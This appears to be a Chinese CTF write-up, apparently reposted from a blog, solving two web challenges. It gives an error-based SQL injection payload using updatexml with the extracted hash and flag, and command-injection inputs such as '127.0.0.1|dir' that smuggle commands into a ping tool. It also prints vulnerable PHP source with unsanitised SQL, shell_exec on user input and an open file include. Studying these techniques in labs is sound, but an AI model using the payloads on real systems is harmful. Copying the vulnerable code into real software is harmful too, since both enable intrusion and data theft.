偶然看到的比赛,我等渣渣跟风做两题,剩下的题目工作太忙没有时间继续做。
第1题 sql注入:
题目知识
考察sql注入知识,题目地址:http://101.200.145.44/web1//index.php
做题过程
第一步:注入Playload
user=flag&pass=' or updatexml(1,concat(0x7e,(select pw from user limit 1,1 )),0)# '
第二步:注入效果
Masel's secure site 重置数据库 Error: XPATH syntax error: '~*75DBBA7B5806E761411'
第三步:获取源码,得知用户名为flag,使用注入出的密码登录可得到flag
用户名为flag 密码为:*75DBBA7B5806E761411 Loggedin!Flag:5a2f5d8f-58fa-481b-a19f-9aab97ba6a4b
相关源码
http://101.200.145.44/web1//index.php.txt
<html> <head> Masel's secure site </head> <body> <a href="setup-db.php">重置数据库</a> <?php include("auth.php"); $servername = $host; $username = $dbuser; $password = $dbpass; $database = $dbname; error_reporting(0); if($_POST["user"] && $_POST["pass"]) { $conn = mysqli_connect($servername, $username, $password, $database); if ($conn->connect_error) { die("Connection failed: " . mysqli_error($conn)); } $user = $_POST["user"]; $pass = $_POST["pass"]; $sql = "select user from user where pw='$pass'"; //echo $sql; $query = mysqli_query($conn,$sql); if (!$query) { printf("Error: %s\n", mysqli_error($conn)); exit(); } $row = mysqli_fetch_array($query); //echo $row["pw"]; if ($row[user]){ if ($row[user] == "flag" && $user=="flag") { echo "<p>Logged in! Flag: ****************** </p>"; } else{ echo "<p>Password is right, but it's not for the flag </p>"; } } else { echo("<p>Wrong password!</p>"); } } ?> <form method=post action=index.php> <input type=text name=user value="Username"> <input type=password name=pass value="Password"> <input type=submit> </form> </body> <a href="index.php.txt">Source</a> </html>
key
Loggedin!Flag:5a2f5d8f-58fa-481b-a19f-9aab97ba6a4b
第2题:命令执行
题目知识
考察命令执行的绕过,题目地址:http://101.200.145.44/web2//index.php
做题过程
第一步:得到文件名
127.0.0.1|dir 或 127.0.0.1&&dir执行结果
1C9976C230DA289C1C359CD2A7C02D48 index.php index.php.txt
第二步:再次得到文件名
127.0.0.1|dir 1C9976C230DA289C1C359CD2A7C02D48执行结果
flag.php
第三步:直接访问
连接URL地址直接访问
http://101.200.145.44/web2/1C9976C230DA289C1C359CD2A7C02D48/flag.php
相关源码
<?php header("Content-type: text/html; charset=utf-8"); ?> <html> <head> <title></title> </head> <body> <div align="center"> <h1 al>我刚做了一个ping命令的小工具,快试一下吧!</h1> <div > <p>请输入目标IP</p> <form name="ping" action="index.php" method="post"> <input type="text" name="ip" size="30"> <input type="submit" value="submit" name="submit"> </form> </div> <div> </body> </html> <?php if( isset( $_POST[ 'submit' ] ) ) { $target = $_REQUEST[ 'ip' ]; if(preg_match('/dir|cd|^(?:[0-9]{1,3}\.){3}[0-9]{1,3}$/',$target)) { // Determine OS and execute the ping command. if (stristr(php_uname('s'), 'Windows NT')) { $cmd = shell_exec( 'ping ' . $target ); echo '<pre>'.iconv('GB2312', 'UTF-8',$cmd).'</pre>'; } else { $cmd = shell_exec( 'ping -c 3 ' . $target ); echo '<pre>'.iconv('GB2312', 'UTF-8',$cmd).'</pre>'; } } else echo "输入格式不正确!"; } if( isset($_GET['file'])) { include($_GET['file']); } ?>
key
flag{0d143dcd-5b29-4f4f-9b16-73665aeb45a8}
来源:https://www.cnblogs.com/17bdw/p/5500119.html